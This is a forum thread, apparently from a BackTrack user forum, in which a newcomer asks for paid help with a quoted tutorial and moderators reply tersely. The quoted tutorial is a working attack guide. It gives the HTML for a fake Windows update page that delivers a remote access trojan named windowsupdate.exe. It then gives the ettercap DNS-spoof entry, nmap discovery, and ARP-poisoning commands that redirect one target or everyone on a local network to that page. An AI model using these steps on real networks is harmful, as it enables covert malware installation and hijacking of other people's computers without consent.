Results 1 to 9 of 9

Thread: Targetting PC on same network

  1. #1
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    7

    Default Targetting PC on same network

    Hi all,

    Ive been trying to follow a tutorial from another forum (see below) I am stuck and have been trying for some hours (googling etc)

    I am stuck on this part

    Now set up the dns_spoofing configuraton

    Code:

    echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

    Replace 192.168.1.101 with your own ip (ifconfig)

    As you can see I havent got very far .... If anyone can help me my msn is

    bowlingo2@yahoo.co.uk

    I can also offer some $ for your help

    Thanks


    ------------------

    This is how to get someone to download your rat if you're on the same network

    This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

    Start by downloading backtrack 4 and burning the iso.


    Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
    Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.


    Code:

    <body>
    <p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
    <p align="center">
    <input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
    </p>
    <p align="center" class="style2"></p>
    <p>&nbsp;</p>
    <form id="form1" name="form1" method="post" action="/upgrade.exe">
    <label for="D"></label>
    </form>
    <p align="left" class="style4">&nbsp;</p>
    </body>
    </html>
    Now copy your rat into the same directory and name it windowsupdate.exe



    Start apache

    Code:

    /etc/init.d/apache2 start
    open firefox and navigate to 127.0.0.1. Your fake update page should show up.

    Now set up the dns_spoofing configuraton

    Code:

    echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

    Replace 192.168.1.101 with your own ip (ifconfig)

    Use nmap to find your target ip

    Code:

    nmap -sP your_subnet/24
    Now arp-poison with ettercap using the dns_spoof plugin.


    Code:

    ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
    replace 192.168.1.102 with your target's ip.
    replace 192.168.1.1 with your gateway ip.
    replace wlan0 with your interface.

    If you want to target everyone on the network you can use the following command.

    Code:

    ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

    Now every time they try to navigate to a web page, they will be redirected to your update page.
    Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

    Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.


    Code:

    ipconfig /flushdns
    This will let them browse again.

    --------------------------------------------------------------------------------

  2. #2
    Member CKing's Avatar
    Join Date
    Mar 2010
    Location
    downtown, riverfront
    Posts
    83

    Default Re: Targetting PC on same network

    Type ifconfig into your console. It will list interfaces, your ip will be listed next to eth0 if your wired in, wlan0 if your wireless. Replace 192.168.1.101 with your ip.
    Last edited by Archangel-Amael; 09-04-2010 at 11:00 PM.
    A true gentleman, a good hearty guy.

  3. #3
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    7

    Default Re: Targetting PC on same network

    ok...I know im a bacon...but anyone any feedback on this?

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Targetting PC on same network

    I see you have neglected to mentioned what error message you received when running the command in question, as well as what you tried in an attempt to resolve the problem yourself. Is the problem that you don't know what your IP address is? If so you probably need to do some reading on TCP/IP networking before anyone here will be willing to usefully help you.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    7

    Default Re: Targetting PC on same network

    thanks for the replies

    Ok...

    As of the tutorial I have

    echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

    I opened a new shell and put the exact line as of above but of course replaced the 192.168.1.101 example ip with my own ip but nothing happened

    I am wondering what is the exact command?

    Thanks

  6. #6
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Targetting PC on same network

    Do you know what the echo command does? Look it up.

    I think you need to spend some time here.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  7. #7
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Targetting PC on same network

    Quote Originally Posted by SinisterZane View Post
    echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns
    I opened a new shell and put the exact line as of above but of course replaced the 192.168.1.101 example ip with my own ip but nothing happened
    Check this out Picture yourself in a cave, yell out echo, and you will hear echo echo echo.
    Now try this in a terminal # echo hello world
    The result will be # hello world


    Now go read the link that lupin kindly posted for you. Your cutting and pasting from a guide and obviously have no idea what you are doing.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  8. #8
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    1

    Lightbulb Re: Targetting PC on same network

    Hello there =)!

    Im a newbie as you but i guess that the command writes the IP to the config file "etter.dns", you don´t see anything at the bash, but it works.

    Good luck

  9. #9
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: Targetting PC on same network

    Quote Originally Posted by Xenoq View Post
    Hello there =)!

    Im a newbie as you but i guess that the command writes the IP to the config file "etter.dns", you don´t see anything at the bash, but it works.

    Good luck
    Yes, that's correct, but I was kind of hoping that with a little prompting the OP might have been motiviated to find that out for him/herself, all while hopefully learning a measure of self reliance.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. Replies: 1
    Last Post: 04-17-2010, 06:36 AM
  2. Replies: 8
    Last Post: 11-26-2009, 08:09 AM
  3. Ad Hoc network
    By shinjuku in forum OLD Wireless
    Replies: 1
    Last Post: 05-29-2009, 09:03 PM
  4. No Network
    By zignar in forum OLD LiveCD Support
    Replies: 8
    Last Post: 05-03-2008, 02:01 AM
  5. Setting up network on local network with bt3 over VMware
    By JibberingJ in forum OLD Newbie Area
    Replies: 3
    Last Post: 02-12-2008, 11:21 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •